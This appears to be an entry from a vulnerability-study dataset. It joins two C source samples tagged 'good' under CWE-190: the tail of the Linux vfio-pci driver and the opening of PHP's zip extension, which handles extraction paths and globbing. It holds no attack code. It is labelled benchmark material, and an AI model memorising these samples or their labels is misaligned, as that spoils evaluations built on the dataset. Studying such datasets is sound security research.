mutex_init(&vdev->igate);
spin_lock_init(&vdev->irqlock);
ret = vfio_add_group_dev(&pdev->dev, &vfio_pci_ops, vdev);
if (ret) {
vfio_iommu_group_put(group, &pdev->dev);
kfree(vdev);
return ret;
}
if (vfio_pci_is_vga(pdev)) {
vga_client_register(pdev, vdev, NULL, vfio_pci_set_vga_decode);
vga_set_legacy_decoding(pdev,
vfio_pci_set_vga_decode(vdev, false));
}
if (!disable_idle_d3) {
/*
* pci-core sets the device power state to an unknown value at
* bootup and after being removed from a driver. The only
* transition it allows from this unknown state is to D0, which
* typically happens when a driver calls pci_enable_device().
* We're not ready to enable the device yet, but we do want to
* be able to get to D3. Therefore first do a D0 transition
* before going to D3.
*/
pci_set_power_state(pdev, PCI_D0);
pci_set_power_state(pdev, PCI_D3hot);
}
return ret;
}
static void vfio_pci_remove(struct pci_dev *pdev)
{
struct vfio_pci_device *vdev;
vdev = vfio_del_group_dev(&pdev->dev);
if (!vdev)
return;
vfio_iommu_group_put(pdev->dev.iommu_group, &pdev->dev);
kfree(vdev->region);
kfree(vdev);
if (vfio_pci_is_vga(pdev)) {
vga_client_register(pdev, NULL, NULL, NULL);
vga_set_legacy_decoding(pdev,
VGA_RSRC_NORMAL_IO | VGA_RSRC_NORMAL_MEM |
VGA_RSRC_LEGACY_IO | VGA_RSRC_LEGACY_MEM);
}
if (!disable_idle_d3)
pci_set_power_state(pdev, PCI_D0);
}
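/*
 * AER error_detected callback: signal the user's error eventfd, if one is
 * registered, and report that recovery may proceed.
 */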
static pci_ers_result_t vfio_pci_aer_err_detected(struct pci_dev *pdev,
pci_channel_state_t state)
{
struct vfio_pci_device *vdev;
struct vfio_device *device;
device = vfio_device_get_from_dev(&pdev->dev);
if (device == NULL)
return PCI_ERS_RESULT_DISCONNECT;
vdev = vfio_device_data(device);
if (vdev == NULL) {
vfio_device_put(device);
return PCI_ERS_RESULT_DISCONNECT;
}
mutex_lock(&vdev->igate);
if (vdev->err_trigger)
eventfd_signal(vdev->err_trigger, 1);
mutex_unlock(&vdev->igate);
vfio_device_put(device);
return PCI_ERS_RESULT_CAN_RECOVER;
}
static const struct pci_error_handlers vfio_err_handlers = {
.error_detected = vfio_pci_aer_err_detected,
};
static struct pci_driver vfio_pci_driver = {
.name = "vfio-pci",
.id_table = NULL, /* only dynamic ids */
.probe = vfio_pci_probe,
.remove = vfio_pci_remove,
.err_handler = &vfio_err_handlers,
};
struct vfio_devices {
struct vfio_device **devices;
int cur_index;
int max_index;
};
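/*
 * pci_walk_bus() callback: take a vfio_device reference on each affected
 * device, failing if any of them is not bound to vfio-pci.
 */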
static int vfio_pci_get_devs(struct pci_dev *pdev, void *data)
{
struct vfio_devices *devs = data;
struct vfio_device *device;
if (devs->cur_index == devs->max_index)
return -ENOSPC;
device = vfio_device_get_from_dev(&pdev->dev);
if (!device)
return -EINVAL;
if (pci_dev_driver(pdev) != &vfio_pci_driver) {
vfio_device_put(device);
return -EBUSY;
}
devs->devices[devs->cur_index++] = device;
return 0;
}
/*
* Attempt to do a bus/slot reset if there are devices affected by a reset for
 * this device that have needs_reset set and all of the affected devices are unused
* (!refcnt). Callers are required to hold driver_lock when calling this to
* prevent device opens and concurrent bus reset attempts. We prevent device
* unbinds by acquiring and holding a reference to the vfio_device.
*
* NB: vfio-core considers a group to be viable even if some devices are
* bound to drivers like pci-stub or pcieport. Here we require all devices
* to be bound to vfio_pci since that's the only way we can be sure they
* stay put.
*/
static void vfio_pci_try_bus_reset(struct vfio_pci_device *vdev)
{
struct vfio_devices devs = { .cur_index = 0 };
int i = 0, ret = -EINVAL;
bool needs_reset = false, slot = false;
struct vfio_pci_device *tmp;
if (!pci_probe_reset_slot(vdev->pdev->slot))
slot = true;
else if (pci_probe_reset_bus(vdev->pdev->bus))
return;
if (vfio_pci_for_each_slot_or_bus(vdev->pdev, vfio_pci_count_devs,
&i, slot) || !i)
return;
devs.max_index = i;
devs.devices = kcalloc(i, sizeof(struct vfio_device *), GFP_KERNEL);
if (!devs.devices)
return;
if (vfio_pci_for_each_slot_or_bus(vdev->pdev,
vfio_pci_get_devs, &devs, slot))
goto put_devs;
for (i = 0; i < devs.cur_index; i++) {
tmp = vfio_device_data(devs.devices[i]);
if (tmp->needs_reset)
needs_reset = true;
if (tmp->refcnt)
goto put_devs;
}
if (needs_reset)
ret = slot ? pci_try_reset_slot(vdev->pdev->slot) :
pci_try_reset_bus(vdev->pdev->bus);
put_devs:
for (i = 0; i < devs.cur_index; i++) {
tmp = vfio_device_data(devs.devices[i]);
if (!ret)
tmp->needs_reset = false;
if (!tmp->refcnt && !disable_idle_d3)
pci_set_power_state(tmp->pdev, PCI_D3hot);
vfio_device_put(devs.devices[i]);
}
kfree(devs.devices);
}
static void __exit vfio_pci_cleanup(void)
{
pci_unregister_driver(&vfio_pci_driver);
vfio_pci_uninit_perm_bits();
}
static void __init vfio_pci_fill_ids(void)
{
char *p, *id;
int rc;
/* no ids passed actually */
if (ids[0] == '\0')
return;
/* add ids specified in the module parameter */
p = ids;
while ((id = strsep(&p, ","))) {
unsigned int vendor, device, subvendor = PCI_ANY_ID,
subdevice = PCI_ANY_ID, class = 0, class_mask = 0;
int fields;
if (!strlen(id))
continue;
fields = sscanf(id, "%x:%x:%x:%x:%x:%x",
&vendor, &device, &subvendor, &subdevice,
&class, &class_mask);
if (fields < 2) {
pr_warn("invalid id string \"%s\"\n", id);
continue;
}
rc = pci_add_dynid(&vfio_pci_driver, vendor, device,
subvendor, subdevice, class, class_mask, 0);
if (rc)
pr_warn("failed to add dynamic id [%04hx:%04hx[%04hx:%04hx]] class %#08x/%08x (%d)\n",
vendor, device, subvendor, subdevice,
class, class_mask, rc);
else
pr_info("add [%04hx:%04hx[%04hx:%04hx]] class %#08x/%08x\n",
vendor, device, subvendor, subdevice,
class, class_mask);
}
}
static int __init vfio_pci_init(void)
{
int ret;
	/* Allocate shared config space permission data used by all devices */
ret = vfio_pci_init_perm_bits();
if (ret)
return ret;
/* Register and scan for devices */
ret = pci_register_driver(&vfio_pci_driver);
if (ret)
goto out_driver;
vfio_pci_fill_ids();
return 0;
out_driver:
vfio_pci_uninit_perm_bits();
return ret;
}
module_init(vfio_pci_init);
module_exit(vfio_pci_cleanup);
MODULE_VERSION(DRIVER_VERSION);
MODULE_LICENSE("GPL v2");
MODULE_AUTHOR(DRIVER_AUTHOR);
MODULE_DESCRIPTION(DRIVER_DESC);
| ./CrossVul/dataset_final_sorted/CWE-190/c/good_5375_0 |
crossvul-cpp_data_good_4988_0 | /*
+----------------------------------------------------------------------+
| PHP Version 7 |
+----------------------------------------------------------------------+
| Copyright (c) 1997-2016 The PHP Group |
+----------------------------------------------------------------------+
| This source file is subject to version 3.01 of the PHP license, |
| that is bundled with this package in the file LICENSE, and is |
| available through the world-wide-web at the following url: |
| http://www.php.net/license/3_01.txt. |
| If you did not receive a copy of the PHP license and are unable to |
| obtain it through the world-wide-web, please send a note to |
| license@php.net so we can mail you a copy immediately. |
+----------------------------------------------------------------------+
| Author: Piere-Alain Joye <pierre@php.net> |
+----------------------------------------------------------------------+
*/
#ifdef HAVE_CONFIG_H
#include "config.h"
#endif
#include "php.h"
#include "php_ini.h"
#include "ext/standard/info.h"
#include "ext/standard/file.h"
#include "ext/standard/php_string.h"
#include "ext/pcre/php_pcre.h"
#include "ext/standard/php_filestat.h"
#include "php_zip.h"
/* zip_open is a macro for renaming libzip zipopen, so we need to use PHP_NAMED_FUNCTION */
static PHP_NAMED_FUNCTION(zif_zip_open);
static PHP_NAMED_FUNCTION(zif_zip_read);
static PHP_NAMED_FUNCTION(zif_zip_close);
static PHP_NAMED_FUNCTION(zif_zip_entry_read);
static PHP_NAMED_FUNCTION(zif_zip_entry_filesize);
static PHP_NAMED_FUNCTION(zif_zip_entry_name);
static PHP_NAMED_FUNCTION(zif_zip_entry_compressedsize);
static PHP_NAMED_FUNCTION(zif_zip_entry_compressionmethod);
static PHP_NAMED_FUNCTION(zif_zip_entry_open);
static PHP_NAMED_FUNCTION(zif_zip_entry_close);
#ifdef HAVE_GLOB
#ifndef PHP_WIN32
#include <glob.h>
#else
#include "win32/glob.h"
#endif
#endif
/* {{{ Resource le */
static int le_zip_dir;
#define le_zip_dir_name "Zip Directory"
static int le_zip_entry;
#define le_zip_entry_name "Zip Entry"
/* }}} */
/* {{{ PHP_ZIP_STAT_INDEX(za, index, flags, sb) */
#define PHP_ZIP_STAT_INDEX(za, index, flags, sb) \
if (zip_stat_index(za, index, flags, &sb) != 0) { \
RETURN_FALSE; \
}
/* }}} */
/* {{{ PHP_ZIP_STAT_PATH(za, path, path_len, flags, sb) */
#define PHP_ZIP_STAT_PATH(za, path, path_len, flags, sb) \
if (path_len < 1) { \
php_error_docref(NULL, E_NOTICE, "Empty string as entry name"); \
RETURN_FALSE; \
} \
if (zip_stat(za, path, flags, &sb) != 0) { \
RETURN_FALSE; \
}
/* }}} */
/* {{{ PHP_ZIP_SET_FILE_COMMENT(za, index, comment, comment_len) */
#define PHP_ZIP_SET_FILE_COMMENT(za, index, comment, comment_len) \
if (comment_len == 0) { \
		/* Passing NULL removes the existing comment */ \
if (zip_set_file_comment(za, index, NULL, 0) < 0) { \
RETURN_FALSE; \
} \
} else if (zip_set_file_comment(za, index, comment, comment_len) < 0) { \
RETURN_FALSE; \
} \
RETURN_TRUE;
/* }}} */
# define add_ascii_assoc_string add_assoc_string
# define add_ascii_assoc_long add_assoc_long
/* Flatten a path by making a relative path (to .)*/
static char * php_zip_make_relative_path(char *path, size_t path_len) /* {{{ */
{
char *path_begin = path;
size_t i;
if (path_len < 1 || path == NULL) {
return NULL;
}
if (IS_SLASH(path[0])) {
return path + 1;
}
i = path_len;
while (1) {
while (i > 0 && !IS_SLASH(path[i])) {
i--;
}
if (!i) {
return path;
}
if (i >= 2 && (path[i -1] == '.' || path[i -1] == ':')) {
/* i is the position of . or :, add 1 for / */
path_begin = path + i + 1;
break;
}
i--;
}
return path_begin;
}
/* }}} */
# define CWD_STATE_ALLOC(l) emalloc(l)
# define CWD_STATE_FREE(s) efree(s)
/* {{{ php_zip_extract_file */
static int php_zip_extract_file(struct zip * za, char *dest, char *file, int file_len)
{
php_stream_statbuf ssb;
struct zip_file *zf;
struct zip_stat sb;
char b[8192];
int n, len, ret;
php_stream *stream;
char *fullpath;
char *file_dirname_fullpath;
char file_dirname[MAXPATHLEN];
size_t dir_len;
int is_dir_only = 0;
char *path_cleaned;
size_t path_cleaned_len;
cwd_state new_state;
zend_string *file_basename;
new_state.cwd = CWD_STATE_ALLOC(1);
new_state.cwd[0] = '\0';
new_state.cwd_length = 0;
	/* Clean/normalize the path and then transform any path (absolute or relative)
to a path relative to cwd (../../mydir/foo.txt > mydir/foo.txt)
*/
virtual_file_ex(&new_state, file, NULL, CWD_EXPAND);
path_cleaned = php_zip_make_relative_path(new_state.cwd, new_state.cwd_length);
if(!path_cleaned) {
return 0;
}
path_cleaned_len = strlen(path_cleaned);
if (path_cleaned_len >= MAXPATHLEN || zip_stat(za, file, 0, &sb) != 0) {
return 0;
}
/* it is a directory only, see #40228 */
if (path_cleaned_len > 1 && IS_SLASH(path_cleaned[path_cleaned_len - 1])) {
len = spprintf(&file_dirname_fullpath, 0, "%s/%s", dest, path_cleaned);
is_dir_only = 1;
} else {
memcpy(file_dirname, path_cleaned, path_cleaned_len);
dir_len = php_dirname(file_dirname, path_cleaned_len);
if (dir_len <= 0 || (dir_len == 1 && file_dirname[0] == '.')) {
len = spprintf(&file_dirname_fullpath, 0, "%s", dest);
} else {
len = spprintf(&file_dirname_fullpath, 0, "%s/%s", dest, file_dirname);
}
file_basename = php_basename(path_cleaned, path_cleaned_len, NULL, 0);
if (ZIP_OPENBASEDIR_CHECKPATH(file_dirname_fullpath)) {
efree(file_dirname_fullpath);
zend_string_release(file_basename);
CWD_STATE_FREE(new_state.cwd);
return 0;
}
}
/* let see if the path already exists */
if (php_stream_stat_path_ex(file_dirname_fullpath, PHP_STREAM_URL_STAT_QUIET, &ssb, NULL) < 0) {
ret = php_stream_mkdir(file_dirname_fullpath, 0777, PHP_STREAM_MKDIR_RECURSIVE|REPORT_ERRORS, NULL);
if (!ret) {
efree(file_dirname_fullpath);
if (!is_dir_only) {
zend_string_release(file_basename);
CWD_STATE_FREE(new_state.cwd);
}
return 0;
}
}
/* it is a standalone directory, job done */
if (is_dir_only) {
efree(file_dirname_fullpath);
CWD_STATE_FREE(new_state.cwd);
return 1;
}
len = spprintf(&fullpath, 0, "%s/%s", file_dirname_fullpath, ZSTR_VAL(file_basename));
if (!len) {
efree(file_dirname_fullpath);
zend_string_release(file_basename);
CWD_STATE_FREE(new_state.cwd);
return 0;
} else if (len > MAXPATHLEN) {
php_error_docref(NULL, E_WARNING, "Full extraction path exceed MAXPATHLEN (%i)", MAXPATHLEN);
efree(file_dirname_fullpath);
zend_string_release(file_basename);
CWD_STATE_FREE(new_state.cwd);
return 0;
}
	/* check the full path again; not sure whether this is
	 * required: can a file have a different safe_mode status
	 * than its parent folder?
	 */
if (ZIP_OPENBASEDIR_CHECKPATH(fullpath)) {
efree(fullpath);
efree(file_dirname_fullpath);
zend_string_release(file_basename);
CWD_STATE_FREE(new_state.cwd);
return 0;
}
stream = php_stream_open_wrapper(fullpath, "w+b", REPORT_ERRORS, NULL);
if (stream == NULL) {
n = -1;
goto done;
}
zf = zip_fopen(za, file, 0);
if (zf == NULL) {
n = -1;
php_stream_close(stream);
goto done;
}
n = 0;
while ((n=zip_fread(zf, b, sizeof(b))) > 0) {
php_stream_write(stream, b, n);
}
php_stream_close(stream);
n = zip_fclose(zf);
done:
efree(fullpath);
zend_string_release(file_basename);
efree(file_dirname_fullpath);
CWD_STATE_FREE(new_state.cwd);
if (n<0) {
return 0;
} else {
return 1;
}
}
/* }}} */
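/* Add a file from the filesystem to the archive: check open_basedir, expand
   the path, verify the file exists, then register it as a zip source and add
   (or overwrite) the named entry. */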
static int php_zip_add_file(struct zip *za, const char *filename, size_t filename_len,
char *entry_name, size_t entry_name_len, long offset_start, long offset_len) /* {{{ */
{
struct zip_source *zs;
char resolved_path[MAXPATHLEN];
zval exists_flag;
if (ZIP_OPENBASEDIR_CHECKPATH(filename)) {
return -1;
}
if (!expand_filepath(filename, resolved_path)) {
return -1;
}
php_stat(resolved_path, strlen(resolved_path), FS_EXISTS, &exists_flag);
if (Z_TYPE(exists_flag) == IS_FALSE) {
return -1;
}
zs = zip_source_file(za, resolved_path, offset_start, offset_len);
if (!zs) {
return -1;
}
if (zip_file_add(za, entry_name, zs, ZIP_FL_OVERWRITE) < 0) {
zip_source_free(zs);
return -1;
} else {
zip_error_clear(za);
return 1;
}
}
/* }}} */
static int php_zip_parse_options(zval *options, zend_long *remove_all_path, char **remove_path, size_t *remove_path_len, char **add_path, size_t *add_path_len) /* {{{ */
{
zval *option;
if ((option = zend_hash_str_find(Z_ARRVAL_P(options), "remove_all_path", sizeof("remove_all_path") - 1)) != NULL) {
*remove_all_path = zval_get_long(option);
}
/* If I add more options, it would make sense to create a nice static struct and loop over it. */
if ((option = zend_hash_str_find(Z_ARRVAL_P(options), "remove_path", sizeof("remove_path") - 1)) != NULL) {
if (Z_TYPE_P(option) != IS_STRING) {
php_error_docref(NULL, E_WARNING, "remove_path option expected to be a string");
return -1;
}
if (Z_STRLEN_P(option) < 1) {
php_error_docref(NULL, E_NOTICE, "Empty string given as remove_path option");
return -1;
}
if (Z_STRLEN_P(option) >= MAXPATHLEN) {
php_error_docref(NULL, E_WARNING, "remove_path string is too long (max: %d, %zd given)",
MAXPATHLEN - 1, Z_STRLEN_P(option));
return -1;
}
*remove_path_len = Z_STRLEN_P(option);
*remove_path = Z_STRVAL_P(option);
}
if ((option = zend_hash_str_find(Z_ARRVAL_P(options), "add_path", sizeof("add_path") - 1)) != NULL) {
if (Z_TYPE_P(option) != IS_STRING) {
php_error_docref(NULL, E_WARNING, "add_path option expected to be a string");
return -1;
}
if (Z_STRLEN_P(option) < 1) {
php_error_docref(NULL, E_NOTICE, "Empty string given as the add_path option");
return -1;
}
if (Z_STRLEN_P(option) >= MAXPATHLEN) {
php_error_docref(NULL, E_WARNING, "add_path string too long (max: %d, %zd given)",
MAXPATHLEN - 1, Z_STRLEN_P(option));
return -1;
}
*add_path_len = Z_STRLEN_P(option);
*add_path = Z_STRVAL_P(option);
}
return 1;
}
/* }}} */
/* {{{ REGISTER_ZIP_CLASS_CONST_LONG */
#define REGISTER_ZIP_CLASS_CONST_LONG(const_name, value) \
zend_declare_class_constant_long(zip_class_entry, const_name, sizeof(const_name)-1, (zend_long)value);
/* }}} */
/* {{{ ZIP_FROM_OBJECT */
#define ZIP_FROM_OBJECT(intern, object) \
{ \
ze_zip_object *obj = Z_ZIP_P(object); \
intern = obj->za; \
if (!intern) { \
php_error_docref(NULL, E_WARNING, "Invalid or uninitialized Zip object"); \
RETURN_FALSE; \
} \
}
/* }}} */
/* {{{ RETURN_SB(sb) */
#define RETURN_SB(sb) \
{ \
array_init(return_value); \
add_ascii_assoc_string(return_value, "name", (char *)(sb)->name); \
add_ascii_assoc_long(return_value, "index", (zend_long) (sb)->index); \
add_ascii_assoc_long(return_value, "crc", (zend_long) (sb)->crc); \
add_ascii_assoc_long(return_value, "size", (zend_long) (sb)->size); \
add_ascii_assoc_long(return_value, "mtime", (zend_long) (sb)->mtime); \
add_ascii_assoc_long(return_value, "comp_size", (zend_long) (sb)->comp_size); \
add_ascii_assoc_long(return_value, "comp_method", (zend_long) (sb)->comp_method); \
}
/* }}} */
static int php_zip_status(struct zip *za) /* {{{ */
{
#if LIBZIP_VERSION_MAJOR < 1
int zep, syp;
zip_error_get(za, &zep, &syp);
#else
int zep;
zip_error_t *err;
err = zip_get_error(za);
zep = zip_error_code_zip(err);
zip_error_fini(err);
#endif
return zep;
}
/* }}} */
static int php_zip_status_sys(struct zip *za) /* {{{ */
{
#if LIBZIP_VERSION_MAJOR < 1
int zep, syp;
zip_error_get(za, &zep, &syp);
#else
int syp;
zip_error_t *err;
err = zip_get_error(za);
syp = zip_error_code_system(err);
zip_error_fini(err);
#endif
return syp;
}
/* }}} */
static int php_zip_get_num_files(struct zip *za) /* {{{ */
{
return zip_get_num_files(za);
}
/* }}} */
static char * php_zipobj_get_filename(ze_zip_object *obj) /* {{{ */
{
if (!obj) {
return NULL;
}
if (obj->filename) {
return obj->filename;
}
return NULL;
}
/* }}} */
static char * php_zipobj_get_zip_comment(struct zip *za, int *len) /* {{{ */
{
if (za) {
return (char *)zip_get_archive_comment(za, len, 0);
}
return NULL;
}
/* }}} */
#ifdef HAVE_GLOB /* {{{ */
#ifndef GLOB_ONLYDIR
#define GLOB_ONLYDIR (1<<30)
#define GLOB_EMULATE_ONLYDIR
#define GLOB_FLAGMASK (~GLOB_ONLYDIR)
#else
#define GLOB_FLAGMASK (~0)
#endif
#ifndef GLOB_BRACE
# define GLOB_BRACE 0
#endif
#ifndef GLOB_MARK
# define GLOB_MARK 0
#endif
#ifndef GLOB_NOSORT
# define GLOB_NOSORT 0
#endif
#ifndef GLOB_NOCHECK
# define GLOB_NOCHECK 0
#endif
#ifndef GLOB_NOESCAPE
# define GLOB_NOESCAPE 0
#endif
#ifndef GLOB_ERR
# define GLOB_ERR 0
#endif
/* This is used for checking the validity of passed flags (passing invalid flags causes a segfault in glob()!) */
#define GLOB_AVAILABLE_FLAGS (0 | GLOB_BRACE | GLOB_MARK | GLOB_NOSORT | GLOB_NOCHECK | GLOB_NOESCAPE | GLOB_ERR | GLOB_ONLYDIR)
#endif /* }}} */
int php_zip_glob(char *pattern, int pattern_len, zend_long flags, zval *return_value) /* {{{ */
{
#ifdef HAVE_GLOB
char cwd[MAXPATHLEN];
int cwd_skip = 0;
#ifdef ZTS
char work_pattern[MAXPATHLEN];
char *result;
#endif
glob_t globbuf;
int n;
int ret;
if (pattern_len >= MAXPATHLEN) {
php_error_docref(NULL, E_WARNING, "Pattern exceeds the maximum allowed length of %d characters", MAXPATHLEN);
return -1;
}
if ((GLOB_AVAILABLE_FLAGS & flags) != flags) {
php_error_docref(NULL, E_WARNING, "At least one of the passed flags is invalid or not supported on this platform");
return -1;
}
#ifdef ZTS
if (!IS_ABSOLUTE_PATH(pattern, pattern_len)) {
result = VCWD_GETCWD(cwd, MAXPATHLEN);
if (!result) {
cwd[0] = '\0';
}
#ifdef PHP_WIN32
if (IS_SLASH(*pattern)) {
cwd[2] = '\0';
}
#endif
cwd_skip = strlen(cwd)+1;
snprintf(work_pattern, MAXPATHLEN, "%s%c%s", cwd, DEFAULT_SLASH, pattern);
pattern = work_pattern;
}
#endif
globbuf.gl_offs = 0;
if (0 != (ret = glob(pattern, flags & GLOB_FLAGMASK, NULL, &globbuf))) {
#ifdef GLOB_NOMATCH
if (GLOB_NOMATCH == ret) {
			/* Some glob implementations simply return no data if no matches
were found, others return the GLOB_NOMATCH error code.
We don't want to treat GLOB_NOMATCH as an error condition
so that PHP glob() behaves the same on both types of
implementations and so that 'foreach (glob() as ...'
can be used for simple glob() calls without further error
checking.
*/
array_init(return_value);
return 0;
}
#endif
return 0;
}
/* now catch the FreeBSD style of "no matches" */
if (!globbuf.gl_pathc || !globbuf.gl_pathv) {
array_init(return_value);
return 0;
}
/* we assume that any glob pattern will match files from one directory only
so checking the dirname of the first match should be sufficient */
strncpy(cwd, globbuf.gl_pathv[0], MAXPATHLEN);
if (ZIP_OPENBASEDIR_CHECKPATH(cwd)) {
return -1;
}
array_init(return_value);
for (n = 0; n < globbuf.gl_pathc; n++) {
/* we need to do this every time since GLOB_ONLYDIR does not guarantee that
* all directories will be filtered. GNU libc documentation states the
* following:
* If the information about the type of the file is easily available
* non-directories will be rejected but no extra work will be done to
* determine the information for each file. I.e., the caller must still be
* able to filter directories out.
*/
if (flags & GLOB_ONLYDIR) {
zend_stat_t s;
if (0 != VCWD_STAT(globbuf.gl_pathv[n], &s)) {
continue;
}
if (S_IFDIR != (s.st_mode & S_IFMT)) {
continue;
}
}
add_next_index_string(return_value, globbuf.gl_pathv[n]+cwd_skip);
}
globfree(&globbuf);
return globbuf.gl_pathc;
#else
php_error_docref(NULL, E_ERROR, "Glob support is not available");
return 0;
#endif /* HAVE_GLOB */
}
/* }}} */
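/* Scan a directory and return, in return_value, the full path of every regular
   file whose name matches the given PCRE pattern; directories are skipped. */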
int php_zip_pcre(zend_string *regexp, char *path, int path_len, zval *return_value) /* {{{ */
{
#ifdef ZTS
char cwd[MAXPATHLEN];
int cwd_skip = 0;
char work_path[MAXPATHLEN];
char *result;
#endif
int files_cnt;
zend_string **namelist;
#ifdef ZTS
if (!IS_ABSOLUTE_PATH(path, path_len)) {
result = VCWD_GETCWD(cwd, MAXPATHLEN);
if (!result) {
cwd[0] = '\0';
}
#ifdef PHP_WIN32
if (IS_SLASH(*path)) {
cwd[2] = '\0';
}
#endif
cwd_skip = strlen(cwd)+1;
snprintf(work_path, MAXPATHLEN, "%s%c%s", cwd, DEFAULT_SLASH, path);
path = work_path;
}
#endif
if (ZIP_OPENBASEDIR_CHECKPATH(path)) {
return -1;
}
files_cnt = php_stream_scandir(path, &namelist, NULL, (void *) php_stream_dirent_alphasort);
if (files_cnt > 0) {
pcre *re = NULL;
pcre_extra *pcre_extra = NULL;
int preg_options = 0, i;
re = pcre_get_compiled_regex(regexp, &pcre_extra, &preg_options);
if (!re) {
php_error_docref(NULL, E_WARNING, "Invalid expression");
return -1;
}
array_init(return_value);
/* only the files, directories are ignored */
for (i = 0; i < files_cnt; i++) {
zend_stat_t s;
char fullpath[MAXPATHLEN];
int ovector[3];
int matches;
int namelist_len = ZSTR_LEN(namelist[i]);
if ((namelist_len == 1 && ZSTR_VAL(namelist[i])[0] == '.') ||
(namelist_len == 2 && ZSTR_VAL(namelist[i])[0] == '.' && ZSTR_VAL(namelist[i])[1] == '.')) {
zend_string_release(namelist[i]);
continue;
}
if ((path_len + namelist_len + 1) >= MAXPATHLEN) {
php_error_docref(NULL, E_WARNING, "add_path string too long (max: %i, %i given)",
MAXPATHLEN - 1, (path_len + namelist_len + 1));
zend_string_release(namelist[i]);
break;
}
snprintf(fullpath, MAXPATHLEN, "%s%c%s", path, DEFAULT_SLASH, ZSTR_VAL(namelist[i]));
if (0 != VCWD_STAT(fullpath, &s)) {
php_error_docref(NULL, E_WARNING, "Cannot read <%s>", fullpath);
zend_string_release(namelist[i]);
continue;
}
if (S_IFDIR == (s.st_mode & S_IFMT)) {
zend_string_release(namelist[i]);
continue;
}
matches = pcre_exec(re, NULL, ZSTR_VAL(namelist[i]), ZSTR_LEN(namelist[i]), 0, 0, ovector, 3);
/* 0 means that the vector is too small to hold all the captured substring offsets */
if (matches < 0) {
zend_string_release(namelist[i]);
continue;
}
add_next_index_string(return_value, fullpath);
zend_string_release(namelist[i]);
}
efree(namelist);
}
return files_cnt;
}
/* }}} */
/* {{{ arginfo */
ZEND_BEGIN_ARG_INFO_EX(arginfo_zip_open, 0, 0, 1)
ZEND_ARG_INFO(0, filename)
ZEND_END_ARG_INFO()
ZEND_BEGIN_ARG_INFO_EX(arginfo_zip_close, 0, 0, 1)
ZEND_ARG_INFO(0, zip)
ZEND_END_ARG_INFO()
ZEND_BEGIN_ARG_INFO_EX(arginfo_zip_read, 0, 0, 1)
ZEND_ARG_INFO(0, zip)
ZEND_END_ARG_INFO()
ZEND_BEGIN_ARG_INFO_EX(arginfo_zip_entry_open, 0, 0, 2)
ZEND_ARG_INFO(0, zip_dp)
ZEND_ARG_INFO(0, zip_entry)
ZEND_ARG_INFO(0, mode)
ZEND_END_ARG_INFO()
ZEND_BEGIN_ARG_INFO_EX(arginfo_zip_entry_close, 0, 0, 1)
ZEND_ARG_INFO(0, zip_ent)
ZEND_END_ARG_INFO()
ZEND_BEGIN_ARG_INFO_EX(arginfo_zip_entry_read, 0, 0, 1)
ZEND_ARG_INFO(0, zip_entry)
ZEND_ARG_INFO(0, len)
ZEND_END_ARG_INFO()
ZEND_BEGIN_ARG_INFO_EX(arginfo_zip_entry_name, 0, 0, 1)
ZEND_ARG_INFO(0, zip_entry)
ZEND_END_ARG_INFO()
ZEND_BEGIN_ARG_INFO_EX(arginfo_zip_entry_compressedsize, 0, 0, 1)
ZEND_ARG_INFO(0, zip_entry)
ZEND_END_ARG_INFO()
ZEND_BEGIN_ARG_INFO_EX(arginfo_zip_entry_filesize, 0, 0, 1)
ZEND_ARG_INFO(0, zip_entry)
ZEND_END_ARG_INFO()
ZEND_BEGIN_ARG_INFO_EX(arginfo_zip_entry_compressionmethod, 0, 0, 1)
ZEND_ARG_INFO(0, zip_entry)
ZEND_END_ARG_INFO()
/* }}} */
/* {{{ zend_function_entry */
static const zend_function_entry zip_functions[] = {
ZEND_RAW_FENTRY("zip_open", zif_zip_open, arginfo_zip_open, 0)
ZEND_RAW_FENTRY("zip_close", zif_zip_close, arginfo_zip_close, 0)
ZEND_RAW_FENTRY("zip_read", zif_zip_read, arginfo_zip_read, 0)
PHP_FE(zip_entry_open, arginfo_zip_entry_open)
PHP_FE(zip_entry_close, arginfo_zip_entry_close)
PHP_FE(zip_entry_read, arginfo_zip_entry_read)
PHP_FE(zip_entry_filesize, arginfo_zip_entry_filesize)
PHP_FE(zip_entry_name, arginfo_zip_entry_name)
PHP_FE(zip_entry_compressedsize, arginfo_zip_entry_compressedsize)
PHP_FE(zip_entry_compressionmethod, arginfo_zip_entry_compressionmethod)
#ifdef PHP_FE_END
PHP_FE_END
#else
{NULL,NULL,NULL}
#endif
};
/* }}} */
/* {{{ ZE2 OO definitions */
static zend_class_entry *zip_class_entry;
static zend_object_handlers zip_object_handlers;
static HashTable zip_prop_handlers;
typedef int (*zip_read_int_t)(struct zip *za);
typedef char *(*zip_read_const_char_t)(struct zip *za, int *len);
typedef char *(*zip_read_const_char_from_ze_t)(ze_zip_object *obj);
typedef struct _zip_prop_handler {
zip_read_int_t read_int_func;
zip_read_const_char_t read_const_char_func;
zip_read_const_char_from_ze_t read_const_char_from_obj_func;
int type;
} zip_prop_handler;
/* }}} */
static void php_zip_register_prop_handler(HashTable *prop_handler, char *name, zip_read_int_t read_int_func, zip_read_const_char_t read_char_func, zip_read_const_char_from_ze_t read_char_from_obj_func, int rettype) /* {{{ */
{
zip_prop_handler hnd;
hnd.read_const_char_func = read_char_func;
hnd.read_int_func = read_int_func;
hnd.read_const_char_from_obj_func = read_char_from_obj_func;
hnd.type = rettype;
zend_hash_str_add_mem(prop_handler, name, strlen(name), &hnd, sizeof(zip_prop_handler));
}
/* }}} */
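/* Read a virtual ZipArchive property through its registered handler and
   convert the result to the zval type declared for that property. */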
static zval *php_zip_property_reader(ze_zip_object *obj, zip_prop_handler *hnd, zval *rv) /* {{{ */
{
const char *retchar = NULL;
int retint = 0;
int len = 0;
if (obj && obj->za != NULL) {
if (hnd->read_const_char_func) {
retchar = hnd->read_const_char_func(obj->za, &len);
} else {
if (hnd->read_int_func) {
retint = hnd->read_int_func(obj->za);
if (retint == -1) {
php_error_docref(NULL, E_WARNING, "Internal zip error returned");
return NULL;
}
} else {
if (hnd->read_const_char_from_obj_func) {
retchar = hnd->read_const_char_from_obj_func(obj);
len = strlen(retchar);
}
}
}
}
switch (hnd->type) {
case IS_STRING:
if (retchar) {
ZVAL_STRINGL(rv, (char *) retchar, len);
} else {
ZVAL_EMPTY_STRING(rv);
}
break;
/* case IS_TRUE */
case IS_FALSE:
ZVAL_BOOL(rv, (long)retint);
break;
case IS_LONG:
ZVAL_LONG(rv, (long)retint);
break;
default:
ZVAL_NULL(rv);
}
return rv;
}
/* }}} */
static zval *php_zip_get_property_ptr_ptr(zval *object, zval *member, int type, void **cache_slot) /* {{{ */
{
ze_zip_object *obj;
zval tmp_member;
zval *retval = NULL;
